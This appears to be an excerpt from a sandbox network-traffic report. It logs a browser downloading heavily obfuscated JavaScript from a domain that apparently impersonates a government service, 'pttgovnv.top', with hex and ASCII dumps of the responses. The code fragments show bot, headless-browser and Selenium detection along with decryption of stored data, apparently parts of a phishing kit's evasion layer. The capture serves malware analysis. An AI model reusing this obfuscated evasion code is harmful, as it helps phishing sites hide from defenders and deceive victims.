          2024-09-01 22:25:20 UTC621INData Raw: 37 61 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27
          Data Ascii: 7adfunction a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','
          2024-09-01 22:25:20 UTC1351INData Raw: 36 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 33 29 29 2f 30 78 37 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 63 29 29 2f 30 78 38 3b 69 66 28 5f 30 78 32 39 62 39 39 36 3d 3d 3d 5f 30 78 33 64 39 63 61 30 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 35 37 31 65 33 62 29 7b 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 30 5f 30 78 31 37 32 36 2c 30 78 36 31 31 31 39 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 30 35 35 28 5f 30 78 66 36 34 34 37 30 2c 5f 30 78 34
          Data Ascii: 6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4
          2024-09-01 22:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          23192.168.2.449761104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC742INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"a97-18fc3d84e20"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcul8CwnuM9UstM7572uc%2F5OPwlbfuRUFQmxo4y8K1pgackxy5kzkGkm4KRbSIXFczw4P5je9zFAL9yT3KY6wsdB05AlIFazQXsK9n4msIZCAPEz3yB1MhvXijC588E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6cfa54207-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC627INData Raw: 61 39 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f
          Data Ascii: a97(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_
          2024-09-01 22:25:20 UTC1369INData Raw: 29 29 3b 63 6f 6e 73 74 20 61 33 31 5f 30 78 32 38 65 37 66 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 63 38 32 31 34 35 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 62 37 37 38 2c 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 33 62 38 39 3d 5f 30 78 63 38 32 31 34 35 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 63 32 64 35 3d 61 33 31 5f 30 78 33 35 35 65 3b 69 66 28 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 62 33 30 34 3d 5f 30 78 32 30 64 65 63 33 5b 5f 30 78 33 61 63 32 64 35 28 30 78 31 32 61 29 5d 28 5f 30 78 33 65 62 37 37 38 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 30 64 65 63 33 3d 6e 75 6c 6c 2c
          Data Ascii: ));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,
          2024-09-01 22:25:20 UTC722INData Raw: 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 39 29 5d 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 30 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 37 29 5d 28 5f 30 78 31 64 62 64 31 34 29 7c 7c 27 27 2c 5f 30 78 61 34 65 37 35 65 29 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 38 29 5d 28 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 34 29 5d 5b 27 55 74 66 38 27 5d 29 2c 5f 30 78 35 35 65 61 32 65 3d 4a 53 4f 4e 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 66 29 5d 28 5f 30 78 35 32 31 31 65 32 7c 7c 27 7b 7d 27 29 3b 69 66 28 5f 30 78 34 65 62 61 33 33 29 7b 5f 30 78 35 35 65 61 32 65 5b 5f 30 78 63 65 34 61 32 66 5d 3d 5f 30 78 34 65 62 61 33
          Data Ascii: 1_0x34f513[_0x49d95c(0x129)][_0x49d95c(0x130)](localStorage[_0x49d95c(0x127)](_0x1dbd14)||'',_0xa4e75e)[_0x49d95c(0x128)](a31_0x34f513[_0x49d95c(0x134)]['Utf8']),_0x55ea2e=JSON[_0x49d95c(0x13f)](_0x5211e2||'{}');if(_0x4eba33){_0x55ea2e[_0xce4a2f]=_0x4eba3
          2024-09-01 22:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          24192.168.2.449765104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC753INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"8a73-18fc3d84e20"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Umwyqb4w8VVmzI88iq2LLtliaFnnJw9jPOWYS3%2Fj%2BD9rif7KR%2FqRDtEW6nBnkDGvS9VcE%2BcqHVVGolxMIqV5Rr0lHGyYhOd1fAHoFIe%2FkEE3TovEJGzpA0Hb05W%2Bz3c%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6c9ec7c88-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC616INData Raw: 37 63 62 66 0d 0a 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38
          Data Ascii: 7cbfvar a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e8
          2024-09-01 22:25:20 UTC1369INData Raw: 61 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 33 5f 30 78 31 61 35 38 2c 30 78 38 39 63 36 38 29 29 3b 69 6d 70 6f 72 74 7b 6c 20 61 73 20 61 32 33 5f 30 78 34 39 32 65 30 35 2c 5f 20 61 73 20 61 32 33 5f 30 78 31 38 35 62 65 65 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 61 32 33 5f 30 78 35 65 37 34 62 31 7d 66 72 6f 6d 27 2e 2f 30 39 62 66 30 31 66 38 4a 78 4b 6e 57 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 6d 20 61 73 20 61 32 33 5f 30 78 35 65 38 39 62 39 7d 66 72 6f 6d 27 2e 2f 65 63 32 31 35 31 37 62 4a 78 4b 6e 57 2e 6a 73 27 3b 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 65 39 39 38 2c 5f 30 78 32 66 36 37 65 62 29 7b 76 61 72 20 5f 30 78 35 35 39
          Data Ascii: a8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x559
          2024-09-01 22:25:20 UTC1369INData Raw: 30 78 35 39 64 38 36 65 29 3b 7d 29 3b 7d 72 65 74 75 72 6e 20 6e 65 77 28 5f 30 78 34 31 32 63 34 30 7c 7c 28 5f 30 78 34 31 32 63 34 30 3d 50 72 6f 6d 69 73 65 29 29 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 38 35 63 64 36 2c 5f 30 78 31 31 62 35 39 61 29 7b 76 61 72 20 5f 30 78 31 63 61 62 62 34 3d 61 32 33 5f 30 78 31 62 39 34 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 31 63 61 62 28 5f 30 78 36 64 38 66 64 38 29 7b 76 61 72 20 5f 30 78 31 39 38 61 66 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 74 72 79 7b 5f 30 78 34 33 65 62 34 38 28 5f 30 78 33 38 38 30 65 37 5b 5f 30 78 31 39 38 61 66 35 28 30 78 32 64 64 29 5d 28 5f 30 78 36 64 38 66 64 38 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 39 64 39 64 33 29 7b 5f 30 78 31 31 62 35 39 61 28 5f 30 78 31 39 64
          Data Ascii: 0x59d86e);});}return new(_0x412c40||(_0x412c40=Promise))(function(_0x385cd6,_0x11b59a){var _0x1cabb4=a23_0x1b94;function _0x3e1cab(_0x6d8fd8){var _0x198af5=a23_0x1b94;try{_0x43eb48(_0x3880e7[_0x198af5(0x2dd)](_0x6d8fd8));}catch(_0x19d9d3){_0x11b59a(_0x19d
          2024-09-01 22:25:20 UTC1369INData Raw: 78 34 34 62 32 36 64 3d 30 78 30 2c 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 26 28 5f 30 78 32 61 64 36 33 37 3d 30 78 30 29 29 2c 5f 30 78 32 61 64 36 33 37 3b 29 74 72 79 7b 69 66 28 5f 30 78 34 33 37 37 33 61 3d 30 78 31 2c 5f 30 78 32 64 39 37 66 64 26 26 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 30 78 32 3f 5f 30 78 32 64 39 37 66 64 5b 27 72 65 74 75 72 6e 27 5d 3a 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 3f 5f 30 78 32 64 39 37 66 64 5b 27 74 68 72 6f 77 27 5d 7c 7c 28 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 32 64 39 37 66 64 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 65 31 29 5d 29 26 26 5f 30 78 35 35 35 34 65 31 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 32 64 39 37 66 64 29 2c 30
          Data Ascii: x44b26d=0x0,_0x15868d[0x0]&&(_0x2ad637=0x0)),_0x2ad637;)try{if(_0x43773a=0x1,_0x2d97fd&&(_0x5554e1=_0x15868d[0x0]&0x2?_0x2d97fd['return']:_0x15868d[0x0]?_0x2d97fd['throw']||((_0x5554e1=_0x2d97fd[_0x396e75(0x2e1)])&&_0x5554e1[_0x396e75(0x278)](_0x2d97fd),0
          2024-09-01 22:25:20 UTC1369INData Raw: 35 28 30 78 32 30 34 29 5d 3d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 2c 5f 30 78 32 61 64 36 33 37 5b 27 6f 70 73 27 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 61 32 29 5d 28 5f 30 78 31 35 38 36 38 64 29 3b 62 72 65 61 6b 3b 7d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 26 26 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 65 63 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 2c 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 66 33 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 7d 5f 30 78 31 35 38 36 38 64 3d 5f 30 78 32 62 31 31 63 30 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 33 64 39 32 35 62 2c 5f 30 78 32 61 64 36
          Data Ascii: 5(0x204)]=_0x5554e1[0x2],_0x2ad637['ops'][_0x396e75(0x2a2)](_0x15868d);break;}_0x5554e1[0x2]&&_0x2ad637[_0x396e75(0x1ec)][_0x396e75(0x254)](),_0x2ad637[_0x396e75(0x1f3)][_0x396e75(0x254)]();continue;}_0x15868d=_0x2b11c0[_0x396e75(0x278)](_0x3d925b,_0x2ad6
          2024-09-01 22:25:20 UTC1369INData Raw: 30 78 31 62 61 29 2c 27 53 65 71 75 65 6e 74 75 6d 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 32 35 29 2c 27 53 6c 69 6d 65 72 4a 53 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 31 64 37 29 2c 27 57 65 62 44 72 69 76 65 72 49 4f 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 33 30 37 29 2b 27 6f 27 2c 27 57 65 62 44 72 69 76 65 72 27 3a 27 77 65 62 64 72 69 76 65 72 27 2c 27 48 65 61 64 6c 65 73 73 43 68 72 6f 6d 65 27 3a 27 68 65 61 64 6c 65 73 73 5f 63 27 2b 27 68 72 6f 6d 65 27 2c 27 55 6e 6b 6e 6f 77 6e 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 39 36 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 63 34 37 65 29 7b 76 61 72 20 5f 30 78 35 35 63 30 35 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30
          Data Ascii: 0x1ba),'Sequentum':a23_0x2208a5(0x225),'SlimerJS':a23_0x2208a5(0x1d7),'WebDriverIO':a23_0x2208a5(0x307)+'o','WebDriver':'webdriver','HeadlessChrome':'headless_c'+'hrome','Unknown':a23_0x2208a5(0x296)},c=function(_0x44c47e){var _0x55c059=(function(){var _0
          2024-09-01 22:25:20 UTC1369INData Raw: 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 37 63 29 5d 3b 69 66 28 2f 73 6c 69 6d 65 72 6a 73 2f 69 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 30 39 29 5d 28 5f 30 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 33 30 30 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 70 28 5f 30 78 66 32 62 35 65 38 2c 5f 30 78 34 62 63 61 31 61 29 7b 76 61 72 20 5f 30 78 34 37 61 31 61 61 3d 61 32 33 5f 30 78 32 32 30 38 61 35 3b 72 65 74 75 72 6e 20 5f 30 78 66 32 62 35 65 38 5b 5f 30 78 34 37 61 31 61 61 28 30 78 32 62 36 29 5d 28 5f 30 78 34 62 63 61 31 61 29 21 3d 3d 2d 30 78 31 3b 7d 66 75 6e 63 74
          Data Ascii: [_0x34c792(0x219)]))return u[_0x34c792(0x27c)];if(/slimerjs/i[_0x34c792(0x209)](_0xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x300)];}function p(_0xf2b5e8,_0x4bca1a){var _0x47a1aa=a23_0x2208a5;return _0xf2b5e8[_0x47a1aa(0x2b6)](_0x4bca1a)!==-0x1;}funct
          2024-09-01 22:25:20 UTC1369INData Raw: 2c 5f 30 78 33 37 66 33 32 36 3d 5f 30 78 36 30 33 32 61 61 28 5f 30 78 34 34 32 37 33 61 29 3b 69 66 28 74 79 70 65 6f 66 20 5f 30 78 33 37 66 33 32 36 3d 3d 27 6f 62 6a 65 63 74 27 29 72 65 74 75 72 6e 20 5f 30 78 33 37 66 33 32 36 5b 5f 30 78 32 33 32 38 38 36 28 30 78 32 31 39 29 5d 3b 7d 72 65 74 75 72 6e 21 30 78 31 3b 7d 66 75 6e 63 74 69 6f 6e 20 67 28 5f 30 78 31 64 66 31 37 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 66 31 37 64 5b 27 72 65 64 75 63 65 27 5d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 33 32 66 37 2c 5f 30 78 34 36 37 66 66 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 33 32 66 37 2b 28 5f 30 78 34 36 37 66 66 36 3f 30 78 31 3a 30 78 30 29 3b 7d 2c 30 78 30 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 33 5f 30 78 31 61 35 38 28 29
          Data Ascii: ,_0x37f326=_0x6032aa(_0x44273a);if(typeof _0x37f326=='object')return _0x37f326[_0x232886(0x219)];}return!0x1;}function g(_0x1df17d){return _0x1df17d['reduce'](function(_0x2332f7,_0x467ff6){return _0x2332f7+(_0x467ff6?0x1:0x0);},0x0);}function a23_0x1a58()
          2024-09-01 22:25:20 UTC1369INData Raw: 2c 27 65 78 74 65 72 6e 61 6c 27 2c 27 63 61 6c 6c 50 68 61 6e 74 6f 27 2c 27 74 6f 4c 6f 77 65 72 43 61 73 27 2c 27 38 64 4f 79 6f 4a 43 27 2c 27 74 65 4e 61 6d 65 73 27 2c 27 34 71 54 73 59 61 77 27 2c 27 65 6c 65 63 74 72 6f 6e 27 2c 27 63 6f 6c 6c 65 63 74 27 2c 27 72 65 65 6e 58 27 2c 27 65 72 72 6f 72 54 72 61 63 65 27 2c 27 57 65 62 4b 69 74 4d 65 64 69 27 2c 27 4d 65 64 69 61 53 65 74 74 69 27 2c 27 53 65 6c 65 6e 69 75 6d 27 2c 27 6e 67 73 52 61 6e 67 65 27 2c 27 77 65 62 47 4c 27 2c 27 38 30 31 30 38 33 37 72 58 65 58 76 4b 27 2c 27 6d 73 69 65 27 2c 27 6c 76 65 4c 6f 63 61 6c 46 69 27 2c 27 6e 66 6f 27 2c 27 72 5f 65 76 61 6c 75 61 74 65 27 2c 27 67 69 6e 41 72 72 61 79 5c 78 32 30 69 27 2c 27 4a 78 4b 6e 57 2e 6a 73 27 2c 27 65 50 72 6f 70 73
          Data Ascii: ,'external','callPhanto','toLowerCas','8dOyoJC','teNames','4qTsYaw','electron','collect','reenX','errorTrace','WebKitMedi','MediaSetti','Selenium','ngsRange','webGL','8010837rXeXvK','msie','lveLocalFi','nfo','r_evaluate','ginArray\x20i','JxKnW.js','eProps
          2024-09-01 22:25:20 UTC1369INData Raw: 2c 27 5f 73 65 6c 65 6e 69 75 6d 27 2c 27 76 65 72 73 69 6f 6e 73 27 2c 27 6f 6e 73 69 73 74 65 6e 74 27 2c 27 63 6f 64 65 27 2c 27 77 69 6e 64 6f 77 45 78 74 65 27 2c 27 68 61 73 4f 77 6e 50 72 6f 70 27 2c 27 6e 65 78 74 27 2c 27 67 65 74 49 74 65 6d 27 2c 27 4e 69 67 68 74 6d 61 72 65 4a 27 2c 27 65 74 73 27 2c 27 72 65 74 75 72 6e 27 2c 27 65 6d 65 6e 74 4b 65 79 73 27 2c 27 72 41 6c 65 72 74 27 2c 27 72 69 6e 67 43 6f 6e 74 65 78 27 2c 27 66 6c 65 63 74 5d 27 2c 27 68 74 74 70 27 2c 27 53 65 71 75 65 6e 74 75 6d 27 2c 27 63 72 65 61 74 65 27 2c 27 5f 75 6e 77 72 61 70 70 65 64 27 2c 27 36 36 34 34 30 67 66 54 55 46 64 27 2c 27 62 6f 74 27 2c 27 41 70 70 6c 65 50 61 79 45 72 27 2c 27 77 65 62 44 72 69 76 65 72 27 2c 27 64 69 73 74 69 6e 63 74 69 76 27
          Data Ascii: ,'_selenium','versions','onsistent','code','windowExte','hasOwnProp','next','getItem','NightmareJ','ets','return','ementKeys','rAlert','ringContex','flect]','http','Sequentum','create','_unwrapped','66440gfTUFd','bot','ApplePayEr','webDriver','distinctiv'


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          25192.168.2.449764104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC758INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"2755a-18fc3d84e20"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fa2EZRwdoJ%2F5ZM2VMVH0EY5NKKTafThlBr6k%2BqkfCETjuUjqFnskEMpEL6u50qyEIN8bkma42rEwSVVVHNhZnl%2Btb%2BQZT2ctYsgIb%2F3kR1cZY7%2BOTe6zXinpX%2Fb0yP0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6cf2d0f71-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC611INData Raw: 37 63 62 39 0d 0a 63 6f 6e 73 74 20 61 33 33 5f 30 78 37 36 32 63 37 31 3d 61 33 33 5f 30 78 64 61 36 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 32 30 33 39 2c 5f 30 78 33 34 61 33 38 65 29 7b 63 6f 6e 73 74 20 5f 30 78 33 30 33 62 61 65 3d 61 33 33 5f 30 78 64 61 36 65 2c 5f 30 78 32 32 66 32 35 61 3d 5f 30 78 31 64 32 30 33 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 63 31 65 34 62 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 31 66 34 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 34 38 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 38 34 33 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74
          Data Ascii: 7cb9const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt
